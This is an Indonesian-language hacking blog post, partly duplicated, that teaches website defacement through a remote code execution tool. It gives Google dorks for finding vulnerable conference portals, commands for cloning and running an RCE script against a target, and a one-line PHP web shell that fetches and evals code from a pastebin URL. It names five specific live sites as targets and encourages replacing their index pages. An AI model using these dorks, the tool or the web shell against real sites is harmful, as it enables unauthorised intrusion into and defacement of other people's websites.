DEFACE POC RCE UPLOAD SHELL TERBARU!!
16
Assalamualaikum wr wb.
Yo wassap gaes :V
Mumpung ada kesempatan nge blog di web team wkwkwk btw sibuk w anjg:( .
Kali ini gw SwamGans(GilangKun) mau kasih tutorial Deface Poc RCE !.
Sebenernya sih itu method dah lama ya anjg tapi gw coba tadi karna baca² juga sih di blog temen + dari gogel ternyata masih banyak web yang pulen(vuln) yang ezzz sangat buat di up shell + tebas peler nya xD
Udah ya anjg gk usah banyak bacod:)
Siapin dulu alat tempur nya xD
-Termux
-Dork Presh
-Rokok
-Face Gans
-Kuota anjg jan lupa !
Ok gan kalo dah siap semua langsung kita ekse aja😎
Pertama kita dorking dulu gan di gogel kalo perlu di deepweb anjg biar pro👊😎
Dork:
~ inurl:/brandUrl=http://
~ inurl:/signin.php?ret=http
~ +"Public" +"My Conferences" +"Personal Library" +"My Profile" +19.49.5200.0
Masukin dork di atas ke gogel :D
Gk paham? Tolol babi liat gambar di bawah anjg.
Udah paham kan anjg?
Nah kalo dah paham tinggal lu cari web vuln nya xD
Caranya? Ezzz banget dong pastinya :*
Kita install dulu tools rce nya.
Buka termux lu asw kalo ga punya donlod sendiri jan manja ! W hek modar lu anjg.
Ketik command nya :
$ pkg update && upgrade
$ pkg install python
$ pkg install wget
$ pkg install bash
$ git clone https://github.com/GarudaTersakti72/RCE
$ ls
$ cd RCE
$ sh install.sh
Udah ? Nah kalo udah cara cek web vuln nya kek gini :
Ketik : python Rce.py http://sitetarget.com
Gk paham? Liat gambar anjg.
Paham?.
Nah sekarang cara biar tau web itu pulen atau ga gimana? Ezzz kalo udah lu klik enter bakalan ada tulisan pulen/tidak pulen kok xD
Kek gini nih kalo pulen.
Tinggal kita up shell deh xD
Caranya? Ketik :
$ echo '<?php eval("?>".file_get_contents("https://pastebin.com/raw/CurQrH1a")); ?>' > sel.php
Masih bingung? Contact Me
JANGAN LUPA SHARE!
JANGAN LUPA KLIK IKLAN JUGA YA BANGSAD !
TITIP NICK TEAM INI YAK, JAN LUPA INDEX BACK UP YA SIBERMEN !
Yo wassap gaes :V
Mumpung ada kesempatan nge blog di web team wkwkwk btw sibuk w anjg:( .
Kali ini gw SwamGans(GilangKun) mau kasih tutorial Deface Poc RCE !.
Sebenernya sih itu method dah lama ya anjg tapi gw coba tadi karna baca² juga sih di blog temen + dari gogel ternyata masih banyak web yang pulen(vuln) yang ezzz sangat buat di up shell + tebas peler nya xD
Udah ya anjg gk usah banyak bacod:)
Siapin dulu alat tempur nya xD
-Termux
-Dork Presh
-Rokok
-Face Gans
-Kuota anjg jan lupa !
Ok gan kalo dah siap semua langsung kita ekse aja😎
Pertama kita dorking dulu gan di gogel kalo perlu di deepweb anjg biar pro👊😎
Dork:
~ inurl:/brandUrl=http://
~ inurl:/signin.php?ret=http
~ +"Public" +"My Conferences" +"Personal Library" +"My Profile" +19.49.5200.0
Masukin dork di atas ke gogel :D
Gk paham? Tolol babi liat gambar di bawah anjg.
Udah paham kan anjg?
Nah kalo dah paham tinggal lu cari web vuln nya xD
Caranya? Ezzz banget dong pastinya :*
Kita install dulu tools rce nya.
Buka termux lu asw kalo ga punya donlod sendiri jan manja ! W hek modar lu anjg.
Ketik command nya :
$ pkg update && upgrade
$ pkg install python
$ pkg install wget
$ pkg install bash
$ git clone https://github.com/GarudaTersakti72/RCE
$ ls
$ cd RCE
$ sh install.sh
Udah ? Nah kalo udah cara cek web vuln nya kek gini :
Ketik : python Rce.py http://sitetarget.com
Gk paham? Liat gambar anjg.
Nah sekarang cara biar tau web itu pulen atau ga gimana? Ezzz kalo udah lu klik enter bakalan ada tulisan pulen/tidak pulen kok xD
Kek gini nih kalo pulen.
Tinggal kita up shell deh xD
Caranya? Ketik :
$ echo '<?php eval("?>".file_get_contents("https://pastebin.com/raw/CurQrH1a")); ?>' > sel.php
Nah kalo bisa ke upload shell nya kek gini nih liat gambar anjg jan liat bokep.
Bakalan ada tulisan No Output.
Cara akses nya? Ezz sangatz http://sitetarget.com/scripts/namashellu.php
Jederrr memexxxx ke upload kan? XD
Terserah mau lu tebas index atau ngga :)
Live target? :
http://conference.jbhm.com
http://conference.crownquest.com
http://conference.longboatkey.org
http://conference.fveng.com
http://sa100.neenah.k12.wi.us
Ok sekian dari gw SwamGans😎
Bakalan ada tulisan No Output.
Cara akses nya? Ezz sangatz http://sitetarget.com/scripts/namashellu.php
Jederrr memexxxx ke upload kan? XD
Terserah mau lu tebas index atau ngga :)
Live target? :
http://conference.jbhm.com
http://conference.crownquest.com
http://conference.longboatkey.org
http://conference.fveng.com
http://sa100.neenah.k12.wi.us
Ok sekian dari gw SwamGans😎
Masih bingung? Contact Me
JANGAN LUPA SHARE!
JANGAN LUPA KLIK IKLAN JUGA YA BANGSAD !
TITIP NICK TEAM INI YAK, JAN LUPA INDEX BACK UP YA SIBERMEN !
https://vulnku.blogspot.com/
Bang Sy Mau Tanya Waktu Sy Akses Di Crome Kok Blank Putih Ya?
Mohon Bantuannya:)
Luthfi : iyaa mas bener,
Link paste bin gimana cara buat ny?